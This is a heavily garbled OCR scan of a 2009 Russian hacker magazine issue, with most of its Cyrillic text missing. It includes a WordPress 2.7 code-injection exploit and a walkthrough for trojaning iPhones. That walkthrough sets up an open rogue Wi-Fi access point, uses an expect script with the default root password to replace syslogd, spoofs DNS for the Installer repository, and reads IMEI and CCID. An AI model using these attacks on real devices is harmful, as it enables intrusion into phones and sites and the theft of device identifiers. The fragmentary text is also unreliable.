wordpress_[] = admin|99|MAC

,
.

WORDPRESS 2.7.X ADMIN REMOTE CODE EXECUTION EXPLOIT


create_function (
Ryat[puretot]) , - ,
!
2.7,
( 2.7.1) - .
./wp-admin/post.php:
if ( current_user_can('edit_post', $post_ID) ) {
if ( $last = wp_check_post_lock( $post->ID ) ) {
$last_user = get_userdata( $last );
X 04 /124/ 09

>>

RSS- WordPress 2.5-2.6.5

WordPress

2.x
$last_user_name = $last_user ? $last_user>display_name : __('Somebody');
$message = sprintf( __( 'Warning: %s is currently
editing this post' ), wp_specialchars( $last_user_name ) );
$message = str_replace( "'", "\'", "<div
class='error'><p>$message</p></div>" );
add_action('admin_notices', create_function(
'', "echo '$message';" ) );
}
else { wp_set_post_lock( $post->ID );
wp_enqueue_script('autosave');
}
}

, edit_post
:
1. display_name - \;phpinfo();\.
$message :
Warning: \';phpinfo();\' is currently editing this post

2. $message stripslashes create_function(),


:
{
echo '<div class='error'><p>';phpinfo();'</p></div>';
}

, code exec.
. ,
admin, , ,
author/editor.


WordPress,
:). . ,
, . , SEO.

, :
.z
X 04 /124/ 09

057

>>

SHADOS
/ SHADOS@MAIL.RU/

CISCO

, !
( ) Cisco, .
, . -

>>

.
. : Cisco 2611
Ethernet-, 64 RAM 16
Flash. , (
DRAM flash
-
).
Cisco IOS Feature Navigator (tools.
cisco.com/ITDIT/CFN/jsp/index.jsp), IOS
12.3(26)
(End-of-Sale
2003, End-of-Life 2008).
,

12.4 ( 12.4T). ,
:
Cisco

, ,
2600 , ,
2611XM.
:
flash-
48 MB ( 2611 16 MB)
SDRAM-
128 MB ( 2611 64 MB)
10/100 Fast
Ethernet ( 2611 10 /c
Ethernet)

058

Cisco IOS Feature Navigator


, IOS
12.4(23). IOS 12.4(21)
Enterprise Base Advanced
Security 128 MB DRAM 32 MB
flash. , 128 MB ,
,
.
,
.
.

EXTENDED,

Cisco IOS 12.4(21)
Enterprise Base
2611
, .

, 10- ,
, , in production.


- PIX (, ,
10 ),
,
IOS 12.4,
12.3?
Cisco IOS Feature Navigator (tools.
cisco.com/ITDIT/CFN/Dispatch).
, ,
, .
,


(just for fun).

, .
DRAM . ,
,
. ,
core -
. ,

IOS 12.4 ,
16 B. :
c2600-entbasek9-mz.124-9.
T1.bin ,
16,4 MB, 17 257 364 .
no-squeezereserve-space ( erase /no-squeezereserve-space flash:), .
, , c2600-ik9o3s3mz.123-13.bin (
,

, ).

? !
tftp, ,
, .
, (,
).
Dynamips.
?
X 04 /124/ 09

>>

Advanced Enterprise Services


Advanced IP + Enterprise + Cisco IOS Firewall

Enterprice Services

Advanced IP Services
IS-IS, MPLS, L2/L3 VPNs, IPv6***,
Mobile Support, IP SLAs, etc.

>> IOS

IPv6***, IS-IS, IP SLAs, IBM Services,


L3 Routed Protocols, etc.

IP Services
EIGRP, OSPF, BGP, GLBP, QoS, High Availability, NAT, nBAR,
VRF-lite, Multicast, Virtual Switching System, etc.

** EIGRP-STUB in IP Base will be available on the Cisco Catalyst 4500 Series (Sup4)
and the Cisco Catalyst 6500 Series.
*** Starting with 12.2(33)SXI on the 6500 series, Cisco is offering packaging
parity for IPv6 feature support for a technology will be packeged in the same
feature set as IPv4. This parity will be expended to other platforms in the future.

IP Base
RIP, HSRP/VRRP, StackWise, GRE, EIGRP STUB**, WCCP, etc.

LAN Base
ACL, QoS, Enhanced 802.1x, AutoQoS, AutoSecure, etc.

Layer 2 Base
Basic Ethernet L2. 802, tx. 802. ts. 802.w.
Ether Chanel, 802. 1d, Port Security. SmartPorts, SSH, etc.

. How to use?
(www.ipflow.utc.fr/index.php/Cisco_7200_
Simulator), , :

<skipped>
To boot quickly, the preferred method is to decompress
the IOS image with the unzip utility. It avoids to run
the self-decompressing process in the emulator.
chris@portchris2:~/dynamips-0.2.5$ unzip -p c7200advipservicesk9-mz.124-9.T.bin > image.bin
warning [c7200-advipservicesk9-mz.124-9.T.bin]: 27904
extra bytes at beginning or within zipfile
(attempting to process anyway)
chris@portchris2:~/dynamips-0.2.5$ file image.bin
image.bin: ELF 32-bit MSB executable, cisco 7200,
version 1 (SYSV), statically linked, stripped
You can ignore the warning, unzip has just skipped the
self-decompressing code at the beginning of the image.
Now, you can boot the imag
<skipped>

r
l
z
x

- The image runs from ROM


- The image is relocatable
- The image is zip compressed
-The image is mzip compressed

mz
zip-.
(WinZIP, WinRAR, 7zip) .

, . , deflate .
, :
7-zip 4.65 :
zip

Deflate
32B
258

: 15,7 MB (16 489 764 bytes). WinZIP


11.2 Deflate
16,0 MB (16 803 634 bytes). WinRAR 3.80,
zip : 16,3 MB (17131 353 bytes).
PKZIP 9.00 , Deflate
16,3 MB (17 094
474 bytes).

, , 7zip.
ELF HEX-

,
,
.
,
( 32-
PowerPC ),
.
, .
: Cisco IOS Configuration
Fundamentals Configuration Guide, Release 12.4 Loading and Managing
System Images, Image Naming Conventions.
:
f - The image runs from flash memory
m - The image runs from RAM
X 04 /124/ 09

059

>>

( )
.
,
WinHex, HT Editor hview. WinHex, HT, .
, IOS, ,
, ELF (Executable
and Linkable Formate). ELF-
*nix-like , .
ELF- ,
1.2, , , libc elf.h. ELF-
:
ELF Header
Program Header Table (optional)
Section 1
Section 2

Section n
Section Header Table

( ),
.
MS Windows, readelf binutils.
HT (hte.sf.net),
ELF. c2600-entbasek9mz.124-9.T1.bin, HT , .
elf.h. , ELF-,
:
typedef struct
Elf_Char
Elf32_Half
Elf32_Half
Elf32_Word
Elf32_Addr
Elf32_Off
Elf32_Off
Elf32_Word
Elf32_Half

060

{
e_ident[EI_NIDENT];
e_type;
e_machine;
e_version;
e_entry;
e_phoff;
e_shoff;
e_flags;
e_ehsize;

Elf32_Half
Elf32_Half
Elf32_Half
Elf32_Half
Elf32_Half
} Elf32_Ehdr;

e_phentsize;
e_phnum;
e_shentsize;
e_shnum;
e_shstrndx;

e_machine 0x002b 43,


SPARC v9:
#define EM_SPARCV9 43 /* SPARC v9 64-bit */

, 2611
Motorolla MPC860, , 0x0014,
:
#define EM_PPC 20 /* PowerPC */

, .
. F6 elf/header. :
-

elf header size 0x34


program header entry
program header count
section header entry
section header count

size 0x20
1
size 0x28
6

, , 52+32+6*40=324 0x144, ,
6 (, 6 ) 1 . ,
IOS.
(, ),
. ,
<F6> elf/section headers,
:
typedef struct
Elf32_Word
Elf32_Word
Elf32_Word
Elf32_Addr
Elf32_Off
Elf32_Word
Elf32_Word
Elf32_Word
Elf32_Word
Elf32_Word
} Elf32_Shdr;

{
sh_name;
sh_type;
sh_flags;
sh_addr;
sh_offset;
sh_size;
sh_link;
sh_info;
sh_addralign;
sh_entsize;

X 04 /124/ 09

>>

HT
flash
sh_type .
, ,
SHT_PROGBITS, ,
. ,
, 0x00000007 ( - ). ()
(SHT_NULL).
, , . , ( sh_size).
, 0x1070e7c 17239676 .
hex- (<F6> hex) (
sh_offset) <F5>.
? ,
PK, , PKZIP-
(pkware.com/documents/casestudies/APPNOTE.TXT), 0x04034b50
? ,
22 . , ,
0xFEEDFACE
0x02AED904. , Cisco Networks Hacking Exposed McGraw
Hill/Osborne.
Andrew A. Vladimirov, Konstantin V. Gavrilenko,
Janis N. Vizulis and Andrei A. Mikhailovsky 2006 IOS 12.3(6).
, 0xFEEDFACE
uncompressed image size, compressed image
size, compressed image checksum, uncompressed image checksum.
,
. ,
, , , , ,
:
Error : compressed image checksum is incorrect
0xB99D8823
Expected a checksum of 0xF6F69877
*** System received a Software forced crash ***
signal= 0x17, code= 0x5, context= 0x800805f0
PC = 0x0, Vector = 0x0, SP = 0x0

( )
.
, zip-, 20 ,
0xFEEDFACE zip ( ,
0x44F8 0x1075360 + 0x44F8). 0x44F8 .
.
X 04 /124/ 09

FEEDFACE

(5), IOS, ,
0x1070e7c 17239676 ( 20 0xFEEDFACE 0x504B0304).
, , 0xFB9D38 16489784
( 20 ).
0xB7158 749912. , , ,
0x1075360 0xFBE208!
0xFEEDFACE:
unpacked image size: 0x02AED904 45013252
packed image size: 0x01070E66 17239654 ( 5 - 22 )
packed image checksum: 0xB58BE139
unpacked image checksum: 0xA29D4F6E
: 0x504B0304

0xFEEDFACE:
unpacked image size: 0x02AED904 ( )
packed image size: 0x00FB9D22 16489762 ( 5 - 22 )
packed image checksum:
- , 0x48000000
unpacked image checksum: 0xA29D4F6E ( )

, , .
,
. 16,4
MB (17257364 bytes) 15,7 MB (16507472 bytes).
, , 749912 .
, flash, , ,
/no-squeeze-reserve-space.
flash,
. ,
, . -

061

>>

rommon
<Ctrl+Break>. tftp
RAM:

Head Total(b) Used(b) Free(b) Lowest(b) Largest(b)


Processor 82A44240 20244772 8718640 11526132 10171028
10098348
I/O 3CA3400 3525632 1650536 1875096 1875096 1875068

rommon 1>tftpdnld -r
<skiped>

:
router#show flash:
TFTP flash copy: Error, image size (16507470) mismatches
netsize (16507472).

, 5 2
( 20 0xFEEDFACE + 2).
,
0xB0257B0D:
Error : compressed image checksum is incorrect
0xB99D8823
Expected a checksum of 0x48000000
*** System received a Software forced crash ***
signal= 0x17, code= 0x5, context= 0x800805f0
PC = 0x0, Vector = 0x0, SP = 0x0

0xFEEDFACE (
HT <F3>, <F5> <F4>, <F2>). .
rommon 4>reset -s

, IOS
.


c2600advsecurityk9-mz.124-21.bin. , 128- 7zip,
15947076 ( 16635336),
flash. ,
RAM :
router#show version
Cisco IOS Software, C2600 Software (C2600ADVSECURITYK9-M), Version 12.4(21), RELEASE SOFTWARE
(fc1)
<skiped>
router#show memory summary

062
62

System flash directory:


File Length Name/status
1 15947076 c2600-advsecurityk9-mz.124-21-shad-pk.bin
[15947140 bytes used, 830072 available, 16777212 total]
16384K bytes of processor board System flash (Read/
Write)

. :
router#verify flash:c2600-advsecurityk9-mz.124-21shad-pk.bin

, , Embedded hash
Calculated hash . 16
.
:
,
:
Embedded Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD
Computed Hash MD5 : 3DD2C6591FF4F033425147DE4540F9CD
CCO Hash MD5 : 79020945BDFE2A354E012C8303136360
Embedded hash verification successful.
File system hash verification successful.


. ,
:
1) PKZIP;
2) ELF;
3) Cisco IOS;
4) rommon .
, .
IDA, *nix-like ,
, , . A
. , , , ,
, .
. ... . z
X 04 /124/ 09


2100 . ( 15%
)

. ,

!
!

+ + DVD:

- 155 ( 25% , )
12

3720

2100

+DVD 6
1200 .

1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .

:

;
20
.
,
.
, . ,
, .

, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru

>>

D0ZNP
/ HTTP://OXOD.RU /

iPhone

APPLE IPHONE

, , Apple iPhone. ,
, , .

>>

. iPhone, , .
,
. ( , ),
Win- , Nix .
, Microsoft.
: ,
( )
.
- Amoi MD-1 ( , )?
Apple iPhone !

064

.
iPhone,
, . 26
120.000 3g. ,
, 250.000 . - 370.000. , , ,
, .
3 . , ...
5-10
.
X 04 /124/ 09

>>

GND

GND GND

10k

R7

C10

8
7
6
5

GND
D1

US 3
IRFZ44N

22

GND GND

1000uF

1000uF

2k2
O1
BC 547

47k

GND

3
4

COMREF
VFB VCC
ILIM OUT
OSCGND

GND GND

R3

10k

100nF

1
2

PAD3

C7

R4

120H

D1

R5

220k

1k
R2

R6

100nF
O2
BC 547

1000uF
4

GND GND

100nF
C11

L2

PAD4

GND

1000uF
C6

PS3
on Temte

PAD2

PS4

120H

O3
PS1 13:13 PS2

O2

1 L1

1000uF

PAD1

Power out to PC

1000uF
2

Power in from car

22nF

GND

GND

GND
10k
C9

R9

1nf

GND

GND

12

?
.
,
.
SMS. , , !


,
? ,
, , .
, , .
- iPhone
.
:
(, 10- )
(150 !)
( )
(
PCMCIA
)
(~2000 ~8000 .
)

,
, .
SSH
, - .
, ARM
200 . USB ,
,
. Asus WL-500G,
, .
X 04 /124/ 09

: http://wiki.openwrt.org/
CompleteTableOfHardware.

, !

. :
- , (oxod.
ru). :
, , ,
. , !

.
.
openwrt, dd-wrt , .
openwrt ,
, , GPL.
, toolchain, ..
-,
. - : expect,
ssh client, sshd, http-, dns-.
openwrt, , :
http://downloads.openwrt.org/kamikaze/8.09/brcm-2.4/openwrt-brcm2.4-squashfs.trx. 15 2009 , .
Failure Mode.
, Reset .
Reset, , . Failure Mode
,
WIKI openwrt . .
- , : ping
192.168.1.1. ,
. tftp-, :
http://www.tftp-server.com/tftp-download.html Windows;
http://packages.debian.org/lenny/tftp Debian stable.

065

>>

- 12 -220 .
300

Asus WL-500G Deluxe

:
tftp 192.168.1.1
tftp> binary
tftp> trace
tftp> put openwrt-brcm-2.4-squashfs.trx

links
openwrt.org

linux
.
dd-wrt.com linux
.
code.google.
com/p/winchain
iPhone
Windows.
oxod.ru
.
. ,
.

,
( ROM). ,
,
. .
:
#~telnet 192.168.1.1
#~passwd //
#~exit //
#~ssh root@192.168.1.1 // .
SSH-

#~ipkg update //

, .
/etc/config/network.
PPPoE, :
config interface wan
option ifname
option proto
option username
option password

warning

!
! ,

!

066

nas0
pppoe
"username"
"password"

.
DHCP-, SSH- SSH-.
.

.

iPhone . ,
.. ,
SSID,
. ,
WiFi-.

, .
,

DNS ( -

!).
, ,
,
. MAC SSID, -.
,
, ,
. /etc/config/
wireless :
config wifi-device
wl0
option type
broadcom
option channel 5
option disabled 0
config wifi-iface
option device wl0
option network lan
option mode
ap
option ssid
Free_Internet
option hidden 0
option encryption none

DHCP-.

:).
config dhcp
option interface
lan
option start
2 //
IP-, 10.0.0.2
option limit
100 //

option leasetime
1h //
,
config dhcp
option interface
wan
option ignore 1

, http://wiki.openwrt.org/
OpenWrtDocs/KamikazeConfiguration (
).

. SSH

iPhone , SSHD.
, toolchain openwrt
expect. ,
X 04 /124/ 09

>>

- . ,

.
:
ipkg
ipkg
ipkg
ipkg
ipkg

install
install
install
install
install

buildroot
make
tcl
scponly
openssh-client

/etc/ssh/ssh_config,
StrictHostKeyChecking no, SSH-

. expect : http://expect.nist.gov/expect.tar.gz.
, : ./configure,
make, make install.
: setenv TCL_LIBRARY /usr/
bin/tcl8.4.19/Library. ,

-. - :
#!/usr/bin/expect
spawn scp /www/iphone-trojan root@10.0.0.2:/
usr/sbin/syslogd
expect assword {send alpine\r}
spawn ssh root@10.0.0.2
expect assword {send alpine\r}
send ldid S /usr/sbin/syslogd\r
send exit\r
expect eof


iphone-trojan, .
, .
dhcp ,
IP.
nmap ,
iPhone.
X 04 /124/ 09

nmap O2 10.0.0.. , nmap


,
. .

. INSTALLER
.
, DNS-
Installer. , ,
, > 50% iPhone . :
, Installer .
.
. DNS-:

dvd

SMS.

#~ipkg install maradns

IP i.ripdev.com
. /etc/mararc /etc/marands/
ripdev.com:
/etc/mararc:
ipv4_bind_addresses = "127.0.0.1, 10.0.0.1"
chroot_dir = "/etc/maradns" //,
, , ,

recursive_acl = "127.0.0.1/8, 10.0.0.0/24" //

zone_transfer_acl = "127.0.0.1/8,
10.0.0.0/24" //
timeout_seconds = 2
csv1 = {}
csv1["ripdev.com."] = "ripdev.com"
dns_port = 53
maximum_cache_elements = 1024
min_ttl_cname = 900
/etc/maradns/ripdev.com:

067

>>
# SOA
Sripdev.com.|86400|%|root@%|200903211634|7200|3600|
604800|1800
# NS
Nripdev.com.|86400|ns.ripdev.com.
#A
Ai.ripdev.com.|86400|10.0.0.1

.
-
. - /www,
h /
my/www-root. - . , :
http://i.ripdev.com/info/index-2.0.plist
http://i.ripdev.com/info/index-2.1.plist
http://i.ripdev.com/info/index-2.2.plist

, Installer,
date version . , ,
. IP-.

z. :
http://i.ripdev.com/info/com.ripdev.install-4.12.0.plist
http://i.ripdev.com/info/com.ripdev.install-4.12.1.plist
http://i.ripdev.com/info/com.ripdev.install-4.12.2.plist

version ,
. size hash. md5
,
.
(
/www/info /www/packages/System), .

. IPHONE
?
sms ( ). ?
iPhone.
xcode Apple SDK, gcc.
Cydia. :
http://code.google.com/p/iphone-dev/wiki/Building
http://code.google.com/p/winchain/

SMS AT /dev/tty.debug.

iPhone/iPhone 3g.
, ! code.google.
com . :

( DVD):
int InitConn(int speed)
{
int fd = open("/dev/tty.debug", O_RDWR | O_NOCTTY);
if(fd == -1) {
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}
ioctl(fd, TIOCEXCL);
fcntl(fd, F_SETFL, 0);
...
return fd;
}
void CloseConn(int fd)
{
tcdrain(fd);
tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs);
close(fd);
}
void SendCmd(int fd, void *buf, size_t size)
{
if(write(fd, buf, size) == -1) {
fprintf(stderr, "SendCmd error. %s\n",
strerror(errno));
exit(1);
}
}

.
, IMEI CCID.
.
AT . ReadResp
, IMEI CCID message. :

http://code.google.com/p/iphone-sms

InitConn
, CloseConn , SendCmd AT ReadResp .

068

if (strstr(readbuf,"+CMGW:")!=NULL) {
smsIndex = atoi(&readbuf[strlen(message)+10]);
}
else if (strstr(readbuf,"+CCID:")!=NULL) {
X 04 /124/ 09

>>

, , JTAG.

strncpy(message, &readbuf[17], 20);


}
else if (strstr(readbuf,"AT+CGSN")!=NULL) {
UCHAR temp[15];
strncpy(temp, &readbuf[10], 15);
sprintf(message,"%s-%s",message,temp);
}

main ,
. CCID,
IMEI, .
,
. , ,
. 14
, ,
802.11g. ,
. , ,
? SMS, ? , , ,
. ,
. . ,

ldid. Cydia. ,
(
).

,
. ,
, .
:
.
-
12 , 1 .
12 ,
8 16 . ,
. :
rlocman.ru/shem/schematics.html?di=33999
X 04 /124/ 09


,
. GPS-, 12
, 1 - .
12/220
( 50 ). ,
. :
12 4.8 / ,
1 . , , . , ,
5 .
+ -,
.
, . , ,
.




. , ,
, .
,
, GPS-.
. ,
! ,
,
Apple iPhone . ,
, DDoS-
-.
iPhone. ,
,
-, ,
... - ,
. z

info



, : , ,
,
,
.

z 2009

. .

069

>>

R0ID
/ R0ID@BK.RU /

>>


:WEBSMSENDER
: WINDOWS 2000/XP
:CYLAAAAN

SMS-
, :
1. -

2.
: www.
websms.ru ,
3.
-

sms-
sms-
. ,
,
- ( ).

Websmsender. - www.websms.ru.
,
sms-,
. , :
1. sms-
2.
3.
4.
5.

sms (,
).
, : 10 1 SMS
1.4 , 1 3
SMS 1.3 ..
,
,
.

70

,
: ,
, ,
SMS.
2-3 ,
:).
, sms-
, , -?
P.S. , sms- ,
.

: CHARON
: WINDOWS 2000/XP
: RHINO
/ - (,
). - ,
.
X-Tools , /
. , Charon.
,
,
, .
,

. :

( //etc)
IP- ( ///etc)
/
-

-
AngryIPScanner
Superscanner
-
RBL (Realtime Blackhole List)
-
(http/ssl/socks4/5)

-

-
GeoIP,
,

( thx to v1ru$, .
)

P.S. DVD.

: FTP-CHECK TOOLZ
: *NIX/WIN
: JENIZIX
FTP-,
.
: ftp-check toolz.

- .
, , :
FTP-
index-,
X 04 /124/ 09

>>
: [XDS] TDS
: *NIX/WIN
: XADDIS

-

,
iframe-
-


( )

(

)
, :
1. FTP_valid.txt
2. FTP_invalid.txt
3. FTP_defaced.txt
4. FTP_unknown.txt
5. FTP_info.txt ,



- /:
ftp://login:pass@server
login:pass@server

PHP 4
, chmod 777 ,
.
, ,
1-2 .

.

: GUARDMOBILE
: WINDOWS MOBILE 5/6
:MASPWARE

?
GuardMobile
Windows Mobile
, .
, :
(/)

( GPS-)
-


(
)

X 04 /124/ 09

.
PIN- ,
.

,
- .
:


.

-

GPS-
/

( )

-/-

SIM-

,
, .

.
,
:
locate :
lock :
unlock :
keylock :
alarmon :

alarmoff :
callback :
softreset/hardreset : , ,
:)

:
#PIN#.
,
:).



( z).
[XDS] TDS.
PHP,
.
:


777
config.php

:
### ###
$usersdir='users';
### ###
$clickf='clicks.txt';
### ###
$unicf='unics.txt';
### ###
$blockf='blocked';
### ###
$startf='start.txt';
###
###
$prevf='previous.txt';
### ###
$redf='redir.txt';
###
### $host='http://www.site.com';
### ###
# $hostn='http://www.sites.com';
### ###
$passw='123';


:

iframe.php
stat.php

, , .
.z

71

>>
MIFRILL
/ MIFRILL@RIDDICK.RU /

- BITTORRENT

The Pirate Bay
, .
XXI , , , ,
. , . - , ThePirateBay.org , , . ,
.


,
,

.
,

ThePirateBay.org TPB,
- . -

, ,
,
.
-
, 2004-
. TPB
.
,
:
(Gottfrid Svartholm aka
anakata), (Fredrik Neij aka

() ()

,

.
2003
Piratbyran ( ).
, . , ,

072

. 2006-
,

.

, , TPB, .
, ,
. ,

- -

TiAMO) (Peter
Sunde Kolmisoppi aka brokep). -

48-
(Carl Lundstrom).

( , ). ,
TPB
,
.
:
DDoS-
, ,
. , -
, - .
,
,
X 04 /124/ 09

>>

.
, 2006-,
, (,
).
,
. , ,
-, ,
, ,
. .

,
,
p2p-. , ,
(,
Napster, Audiogalaxy KaZaA ).
BitTorrent
, -.

, , ,
, TPB .


,

.
e-mail , ,
.
,

,

.
,
-
: 2008
TPB 3
,
25 ,
Alexa Internet 107 .
TPB .

Microsoft, Apple, SEGA, DreamWorks, Warner
Bros ,
.
,
. ,

thepiratebay.org/legal, ,
. X 04 /124/ 09

! TPB

31
2008, ,
.
?, Warner Bros., MGM Pictures,
Columbia Pictures, 20th Century Fox Sony BMG

, , .


,

,

$188.000.
, ,
14 .

.
,
,
,
.
The Pirate Bay, , . -,

. ,
Spectrial (
spectacle trial -).

:).

. , :
,
.
, .
.
:
, .
.
.
,
,
, .
,

,
TPB.

073

>>
: -

, 16- ,
, ,
,

: All your
base are belong to bus.
-, - .
,
,
,
$60.
,

-
.
,
. twitter.com
#spectrial,
, TPB

.
,
,
, ,
. The Pirate Bay
,
.
, IFPI
( )
,
,
.
:
, , , - .

,

. ,
,
, -

TPB,

trial.thepiratebay.org,
,
.
15

The Pirate Bay ,


, .torrent-
TPB.
,
DHT,
.
, ,
. IFPI, ,
, .
,
,
,
, ,

. -
,
, ,

DHT,
.
.

: EPIC
WINNING LOL.
IFPI , ,
, , ,

?
4 , 9 22 .
The Pirate Bay
:
IFPI (
):
Sony BMG Music Entertainment
Sweden AB,
Universal Music AB,
Playground Music Scandinavia AB,
Bonnier Amigo Music Group AB,

074

EMI Music Sweden AB,


Warner Bros. Music Sweden AB;
Antipiratbyran (
):
Yellow Bird Films AB,
Nordisk Film,
Henrik Danstrup;
MAQS Law Firm Advokatbyra KB:
Warner Bros. Entertainment Inc,
MGM Pictures Inc,
Columbia Pictures Industries Inc,
20th Century Fox Films Co,
Mars Media Beteiligungs GmbH &

Co Filmproduktions,
Blizzard Entertainment Inc,
Sierra Entertainment Inc,
Activision Publishing Inc.

,
:
Prison Break ( ,
113)

, :
Kurt Wallander:
Wallander Den svaga punkten
Wallander Afrikanen
Wallander Mastermind
Pusher III


, :
Call of Duty 2
Diablo II
F.E.A.R.
World of Warcraft

X 04 /124/ 09

>>
, TPB
. , ,
, (global distribution license).
, IFPI, , Beatles Let it Be
,
. :
.
, Sony
(Svenska Antipiratbyran) , TPB
. , , .
, , , , ,
, ,
.


(Monique Wadsted).

. ,

,
.
, ,
-. ,
.
, -
, () . South park
, ,

? ,
,
. , , ,
, .
: 2000/31/EG
, .
, , The Pirate Bay .
, .
-. ... , ,

, 2006

. : , ,

TPB , ( )
(Xenu) . ,
. ,
75
. ,
, , ,
. , ,
.
,
.
, , , . ,
,
, South Park.
D ( wasted
).
,
, , , . , Google, ,
.torrent- TPB,
. , -


. .
, -, , ,
- .
, , ,
,
TPB, . , ,
,
,
TPB
. , , ,
,
, TPB ,
- . , , .

i , . ,
, , ,
, , ,
. ,
1000 , TPB, 80% -

X 04 /124/ 09

075

>>
, Google,
,
YouTube, .
, .torrent-
The Pirate Bay, .torrent-
FTP .
, .
,
.
? : ,
,
TPB ,
, , ,
, .
,
. , ,
. ,

, . ,
, IFPI

. ,
Brokep.com,
, :
.
, , ,
, , 48 , TPB?
,
, .

: VS


.
- :
?, .
: (Magnus Martensson) IFPI, 15 , (Anders
Nilsson) . ,
, ,
TPB, , ...
. , . , .
: , , DHT Peer
Exchange?
: DHT .
.
: , , ?
: . ,
, - .
: , DHT, , ,
The Pirate Bay ?
: .
,
, . ,
, , . , ,
, TPB
,
.
25- .

076

. :
(John Kennedy), IFPI; (Per
Sundin), Universal Music;
(Bertil Sandgren), (Svenska Filminstitutet) (Ludwig Werner)
IFPI.
, .
, , - , , ,
, . :
, .
,
.
, - The Pirate
Bay, , ,
. : ,
thepiratebay.org (
), : 50% -
- thepiratebay.org.
: , .
, .
. , ( , , )
9- . , ,
.
,
, (Kristoffer Schollin),
, .
,
BitTorrent, ,
- ,
, Intel Blizzard.
, , ,
, .
, Google,
.

,
(Roger Wallis),
. 68 40
X 04 /124/ 09

>>
,
39-
. , :).
6.000
. , ,
.

FINITA LA COMEDIA


,
.
.
,
IT. , ,
, 1969 ,
-.
,
,
. , ,

CD-. , - ,
. , mp3-, ,
, .
.
3- , , ,
. , ,
, , - ( ). ,
mp3- , ,
.
,
. ,
,
, - .
, : .
, , ,
- flowerstorm . ,
,
. ,
.
X 04 /124/ 09

. ,
. TPB .
2006 , 2002. ,
, ,
- - ,
. , , , ,
, , .

, . , , . , ,
TPB
, . ,
. , , ,
,
,
. , ,
, -
.
, ,
, . ,
, ,
, , ,
IFPI.
, 17- 13:00
, .
, , ,
.
,
? , TPB ,
(
, ),
. ,
.
, ,
. , -
, .
, ,
.
TPB, ,
? , ,
,
. ,
. , The Pirate Bay
,
. , , , TPB

. z

077

MAXI Racing

MAXI tuning
Car Audio &
Mobile Media Alpine,
Opel,
MSN.ru
.
MAXI Racing
402 . ,
, .
MAXI Racing!


. , ,
,

, .
,
! (
)
OPC Opel!
.
! ,

Opel Vectra OPC
Zafira OPC . ,
, Opel Cors.

.
,
.

,
,
. ! ,
,
.
.
Alpine,
!
,
,
.

:
, Alpine .
,

, , , . , ,
,
. ,

Alpine!
Alpine AlpineF#1Status.

!
,
,
, 50 000
!

.
? . ,
.
.
(
Alpine MSN.ru), ,
.

, .
, , ,
.
Alpine MSN.ru,
, :

Opel.
: 3
: - . .

, , ,

.
, ,

!

.
.
,
. , ,
Opel
OPC. ,
!
,
.

,
!
! ,

! ,
!
1. Alpine: CD-, ,
, IPod Bluetooth
Alpine.
2. : 50 000 (
)
3. MAXI Tunung:
,

, , ! Opel
Opel Corsa!!!!!
,
Cordiant 15%

Cordiant !
!

.
! ,
!
. !

! , !
! !
, - , MAXI RACING!
, !

>> unixoid
.

50

50

94

40

40

30

30

20

20

10

10

RAM
64

32
0

0
AXFS

JFFS2

CRAMFS

SQUASHFS

Flash

AXFS

SQUASHFS XIP AXFS XIP CRAMFS

JFFS2

SQUASHFS

AXFS

AXFS: (), (), ( RAM/FLASH) ()

J1M
/ ZOBNIN@GMAIL.COM/


, UNIX-
,
UNIX FOSS. IT-
, .
, USENIX Linux
Symposium .
>> unixoid

KORSET HIDS
C C++
. 25 ,
.
NX-, , ,
. ,
shell-, .
. - .
, ,
.

(HIDS).
, :
,
, , .

080

HIDS: .
, HIDS ,
,
. HIDS
, ,
.
HIDS, , -.
,
( ,
..), .
: ,
( - SELinux
Apache ).
HIDS Korset (www.korset.org), Linux Symposium 2008,
HIDS,

. Korset Control Flow Graph
X 04 /124/ 09

>> unixoid
KORSET

User Space

Kernel Space

System Calls

example c

example

i=read(fd, buf, n);


if (i==n) {
write(fd, buf, n);
}
close(fd);

gcc, ld, ...

ELF
executable

Korset
Monitoring
Agent

Korset Static Analyzer

Kernel
System Call
Handler

read
write

close

1)syscall90
2)fwrite()
3)ryscall140
4)syscall91
5)syscall125
6)syscall+5
7) syscall4
8) syscall197
9) syscall10S
10) syscall54

example. korset


FWRITE()

, VX32

Host Operating System


Kernel Address Space

10

9
7

(x86-32 or x86-64)

4
Host Application
Address Space
(x86-32 or x86-64)

AXFS

(quest address space expands


as heap grows)
Flat Model
Code, Data
Segments

SUPERBLOCK

quest heap
quest code, data, bss
Guest
Data
Segment

default quest stack


Guest Address Space
(always x86-32)

quest execution state,


code tragment cache
vx32 sandbox library
Host Application
code, data, bss, heap
(x86-32 or x86-64)
0

X 04 /124/ 09

Region Descriptor
Region Descriptor

0
Guest
Control
Segment

Region Descriptor
Region Descriptor
Region - file names
Region - node offsets
Region - compressed nodes
Region - xip nodes

081

>> unixoid
(CFG), ,
.

.
, ,
.
, Korset GNU
build tools (gcc, ld, as, ar) ,
CFG .
Monitoring Agent ELF, CFG ( .korset).
- security_system_call,
security_operations,
CFG. , ,
task_struct CFG .
, Korset . . -, CFG
,
. -, CFG .
shell- ,
CFG (, open(),
, ), . , -,
Korset : x86,
, ,
setjmp longjmp.

VX32

. : Chroot, FreeBSD Jail, Linux Lguest, Solaris
Zones. JavaVM , - . VMWare
qemu , ,
.
,
x86. , ,
Java, x86-,
gcc.

. API.
. ,
,
- , -,

API .
, .
, .
(
),
, ,
, API (
int call). (jmp)
( ).
. :
.
Vx32 (pdos.csail.mit.edu/~baford/vm),
USENIX08,
,
.
.

, - ,

082

, .
, ,
, .

, . Vx32, ,
(ds, es, ss),
-
. , Vx32
- ( : jmp
, call, int, ret) ,
,
. Vx32 ,
, Plan9, -, Linux (Linux API Vx32).

( 80%). :
x86.

KVMFS

.
,

(HPC)


.
,
.
(

).
(HPC)
(
).

x86-.

, .
Linux kvm,
qemu. qemu
, /, ,
..
qemu , , ,
, .
KvmFS, Linux Symposium 2007,
X 04 /124/ 09

>> unixoid
. KvmFS 9P (,
Plan9) , , Linux,
qemu
. KvmFS
qemu.
host.
org:
#
#
#
#
#
#
#
#
#
#
#

mount -t 9p host.org /mnt/9


cd /mnt/9
tail -f clone &
cd 0
cp ~/disk.img fs/disk.img
cp ~/vmstate fs/vmstate
echo dev hda disk.img > ctl
